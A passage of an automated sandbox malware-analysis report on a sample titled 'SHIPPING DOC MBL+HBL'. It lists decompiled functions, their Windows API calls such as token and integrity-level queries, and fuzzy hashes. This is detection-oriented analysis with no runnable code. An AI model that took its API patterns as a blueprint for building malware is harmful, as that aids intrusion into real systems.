                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • String ID:
                    • API String ID: 2294984445-0
                    • Opcode ID: 6515aa4b52c82ce9b4a01e04d90f663e34346dd2155a27e6b801b6942adec6d0
                    • Instruction ID: ff03bb0c560fa68340587dcccc6c58cf408e7982d5fc06dcfc1c7f650a4be4b3
                    • Opcode Fuzzy Hash: 6515aa4b52c82ce9b4a01e04d90f663e34346dd2155a27e6b801b6942adec6d0
                    • Instruction Fuzzy Hash: E6217C32910655AFCB14AF798C08A6A37A4EB05725F105738F93EF62F0E730A8559B90
                    Function 00E595C9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E595E2
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E59614
                    • __itow.LIBCMT ref: 00E5962C
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E59654
                    • __itow.LIBCMT ref: 00E59665
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • String ID:
                    • API String ID: 2983881199-0
                    • Opcode ID: 503368bac5f7815e5d3cc74635229208b1143c86703d4f0c18e267701de2c88c
                    • Instruction ID: 36e043f6969e02eed8b211c7fd8eccd026c6b4e52f8db16e7c7efaaaf2f39433
                    • Opcode Fuzzy Hash: 503368bac5f7815e5d3cc74635229208b1143c86703d4f0c18e267701de2c88c
                    • Instruction Fuzzy Hash: EA21C831B00214FBDB10AAA58C89EEE7BE8DB59715F042425FD04F7292D6B09D8D9792
                    Function 00E012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E0134D
                    • SelectObject.GDI32(?,00000000), ref: 00E0135C
                    • BeginPath.GDI32(?), ref: 00E01373
                    • SelectObject.GDI32(?,00000000), ref: 00E0139C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: d0abdcf5ce62585502134d0328c2978b40b9f56737a1cffe18eea5514f72dc5b
                    • Instruction ID: 709200f88d8a2a1ad9145e43941455a64033527b9ae35da16d4be869cdeda1d8
                    • Opcode Fuzzy Hash: d0abdcf5ce62585502134d0328c2978b40b9f56737a1cffe18eea5514f72dc5b
                    • Instruction Fuzzy Hash: 16214F32800604DFDB159F16EC09B6D7BA8EB00355F54427AF414BA1E0D776A8DADF50
                    Function 00E64B3A Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00E64B61
                    • __beginthreadex.LIBCMT ref: 00E64B7F
                    • MessageBoxW.USER32(?,?,?,?), ref: 00E64B94
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E64BAA
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E64BB1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • String ID:
                    • API String ID: 3824534824-0
                    • Opcode ID: 35117d51f8b8986b2cdc28f7f2e45f712f6f7f1ab995deb976c73672d3fe6bf9
                    • Instruction ID: a2a5c198bb70555cd9b561c3128bed1c9b71cec0ff143a37c92d908843ab2655
                    • Opcode Fuzzy Hash: 35117d51f8b8986b2cdc28f7f2e45f712f6f7f1ab995deb976c73672d3fe6bf9
                    • Instruction Fuzzy Hash: C31125B2905204AFC7019BA9EC08E9A7FECEB44324F140265F814F32A1D6B2C84887A0
                    Function 00E5852A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E58546
                    • GetLastError.KERNEL32(?,00E5800A,?,?,?), ref: 00E58550
                    • GetProcessHeap.KERNEL32(00000008,?,?,00E5800A,?,?,?), ref: 00E5855F
                    • HeapAlloc.KERNEL32(00000000,?,00E5800A,?,?,?), ref: 00E58566
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E5857D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 842720411-0
                    • Opcode ID: 28bfbf8c5ee9f959bbd5d3c950983d20b2d33eca0b5ffbb6449c0720146deeb7
                    • Instruction ID: d3e3c449e38f83b39779cda0652d9ea0a53bc0c8113b5135ec04b9b606755c0a
                    • Opcode Fuzzy Hash: 28bfbf8c5ee9f959bbd5d3c950983d20b2d33eca0b5ffbb6449c0720146deeb7
                    • Instruction Fuzzy Hash: B7014F71601204EFDB114FA6ED48D6B7B6CFF457557140529F809E2120EA318D14DF60
                    Function 00E652EB Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65307
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E65315
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E6531D
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E65327
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65363
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: ca2958441eff8578f2d69eba2155b659d580c18c97d014b256d66270e581e183
                    • Instruction ID: fe666ae3d5557636137468949b83fe70fcdeaf32aa55dcc174c0c677e0f9d0ae
                    • Opcode Fuzzy Hash: ca2958441eff8578f2d69eba2155b659d580c18c97d014b256d66270e581e183
                    • Instruction Fuzzy Hash: C601AD32D82A1DDBCF009FE5EC8C5EDBB78FB08780F01045AE845F2254CB70551487A1
                    Function 00E57432 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                    Download Yara Rule
                    APIs
                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?,?,?,00E5777D), ref: 00E5744F
                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?,?), ref: 00E5746A
                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?,?), ref: 00E57478
                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?), ref: 00E57488
                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?,?), ref: 00E57494
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    • Opcode ID: c4d5a342b48e72f4e3e39c344adfcaf188ea0bf0a13e99c5bf228ce628d45aa3
                    • Instruction ID: 3cbd6c5a21fac771aa5e7e576703547058fd11c7a943c5b2afa918a36a453c38
                    • Opcode Fuzzy Hash: c4d5a342b48e72f4e3e39c344adfcaf188ea0bf0a13e99c5bf228ce628d45aa3
                    • Instruction Fuzzy Hash: A0018F72601218BFDB245F65EC44BAA7FBDEB44762F145424FD48E2220EB31DD589BA0
                    Function 00E583D1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E583E8
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E583F2
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E58401
                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E58408
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E5841E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: f70cde26ba4d04e17bce5e089fd5856116e36d85f7f1c6abb5f1d94dc5eabf1c
                    • Instruction ID: 7c243ac967b44f06d551dc37f0e91f57a01af0b4239d211aae6f8abe3cce5c58
                    • Opcode Fuzzy Hash: f70cde26ba4d04e17bce5e089fd5856116e36d85f7f1c6abb5f1d94dc5eabf1c
                    • Instruction Fuzzy Hash: C4F04F31205305AFEB105FA6DC8DE6B3BACEF89759F100425FD4AE6150DA61DC49EB60
                    Function 00E58432 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E58449
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E58453
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58462
                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58469
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E5847F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: d18807c80b875cabef408977b73f16265055043b32e5cfbb7fc3995551877c17
                    • Instruction ID: 13f128066bde410a3ac7d58f1ee211e3dbfcf891aecdc2fc640dcaed73eef4d8
                    • Opcode Fuzzy Hash: d18807c80b875cabef408977b73f16265055043b32e5cfbb7fc3995551877c17
                    • Instruction Fuzzy Hash: 33F0A930201305AFEB211FA6EC88E6B3BACEF89759B140429FD09E3150DA60D808EB60
                    Function 00E5C4A5 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00E5C4B9
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E5C4D0
                    • MessageBeep.USER32(00000000), ref: 00E5C4E8
                    • KillTimer.USER32(?,0000040A), ref: 00E5C504
                    • EndDialog.USER32(?,00000001), ref: 00E5C51E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
                    • Opcode ID: c85930352d656497ef3393dbd2c5cc13d72f20689ce86aa775d1a81b5585a8f9
                    • Instruction ID: 278cf45e8f8ca7f9d7dcf6be06a4000af8d232b404aa8f456338025cf81eec36
                    • Opcode Fuzzy Hash: c85930352d656497ef3393dbd2c5cc13d72f20689ce86aa775d1a81b5585a8f9
                    • Instruction Fuzzy Hash: CF01A230400304AFEB215B61DC5EFA677B8FF0470AF100669E986B10E0EBE0A98C8B80
                    Function 00E013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • EndPath.GDI32(?), ref: 00E013BF
                    • StrokeAndFillPath.GDI32(?,?,00E3BA08,00000000,?), ref: 00E013DB
                    • SelectObject.GDI32(?,00000000), ref: 00E013EE
                    • DeleteObject.GDI32 ref: 00E01401
                    • StrokePath.GDI32(?), ref: 00E0141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: e0af359788ba7016d89806fb691569d9d8b411627e6e3446b13e750e624a2fbb
                    • Instruction ID: b8b0feaad721f917429dfd6e92a44a73260bcc9218df46d21fbce9587d7e1b84
                    • Opcode Fuzzy Hash: e0af359788ba7016d89806fb691569d9d8b411627e6e3446b13e750e624a2fbb
                    • Instruction Fuzzy Hash: 88F0C932004A08EFDB195F27ED4CB583BA5A71132AF189275E429A90F1CB3659DADF50
                    Function 00E6C423 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00E6C4BE
                    • CoCreateInstance.OLE32(00E92D6C,00000000,00000001,00E92BDC,?), ref: 00E6C4D6
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                    • CoUninitialize.OLE32 ref: 00E6C743
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CreateInitializeInstanceUninitialize_memmove
                    • String ID: .lnk
                    • API String ID: 2683427295-24824748
                    • Opcode ID: 4d0feabbc37fcc375016b5fd68f8fd0b1c7f88440a9c2f7d1c42801ca696c013
                    • Instruction ID: 21c46f02d3da2e7ae8f41c8d6daf67a8ceb001fdda2a43505bb5e9d000859ca8
                    • Opcode Fuzzy Hash: 4d0feabbc37fcc375016b5fd68f8fd0b1c7f88440a9c2f7d1c42801ca696c013
                    • Instruction Fuzzy Hash: 20A12B71208205AFD704EF64C891EABB7F8EF98304F00595DF596A71D2DB70EA89CB52
                    Function 00E12E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E20F36: std::exception::exception.LIBCMT ref: 00E20F6C
                      • Part of subcall function 00E20F36: __CxxThrowException@8.LIBCMT ref: 00E20F81
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E07BB1: _memmove.LIBCMT ref: 00E07C0B
                    • __swprintf.LIBCMT ref: 00E1302D
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E12EC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: 2a612c9ea74d030e0da86309cc6451a5819c10a21f13bf481f3dc9b2790b2cc5
                    • Instruction ID: 474b4c82e2e159801700366e676d1fd79d648e24fd7cfec0d51c95aa97c7af8e
                    • Opcode Fuzzy Hash: 2a612c9ea74d030e0da86309cc6451a5819c10a21f13bf481f3dc9b2790b2cc5
                    • Instruction Fuzzy Hash: 46915E716083019FCB18EF24D895CAFB7E4EF99700F04691DF495A72A2DA30EE85CB52
                    Function 00E6B9C7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E048A1,?,?,00E037C0,?), ref: 00E048CE
                    • CoInitialize.OLE32(00000000), ref: 00E6BA47
                    • CoCreateInstance.OLE32(00E92D6C,00000000,00000001,00E92BDC,?), ref: 00E6BA60
                    • CoUninitialize.OLE32 ref: 00E6BA7D
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                    • String ID: .lnk
                    • API String ID: 2126378814-24824748
                    • Opcode ID: 98875f112f1399b0a39d1f7dd4a3728bfd635a378582aedb83326b3a9f21027d
                    • Instruction ID: 5248a23f5dd5667f57cea0288df3fe13e1544ddaa3c92d26919d7341c712dc8b
                    • Opcode Fuzzy Hash: 98875f112f1399b0a39d1f7dd4a3728bfd635a378582aedb83326b3a9f21027d
                    • Instruction Fuzzy Hash: DDA155756043019FCB14DF54C884D6ABBE5FF88314F149998F89AAB3A2CB31ED85CB91
                    Function 00E5B5B5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                    Download Yara Rule
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 00E5B780
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container$%
                    • API String ID: 3565006973-1286912533
                    • Opcode ID: 1ea00f525998e4d2b08bf427e5e9665771e6949c23be4efc9e3760efbe7d72a3
                    • Instruction ID: 0ebb5d7917b1cd212795b4652868619580c940d4144ecd5e75972250f0da683a
                    • Opcode Fuzzy Hash: 1ea00f525998e4d2b08bf427e5e9665771e6949c23be4efc9e3760efbe7d72a3
                    • Instruction Fuzzy Hash: CD916B70600201AFDB14DF64C885B66BBF9FF48715F10996EF949EB691DBB0E844CB50
                    Function 00E2518D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                    Download Yara Rule
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 00E2521D
                      • Part of subcall function 00E30270: __87except.LIBCMT ref: 00E302AB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: 314baefdb16c127fcc00ccbec363571648ab4600c1b3574986af097e1d4e4cfe
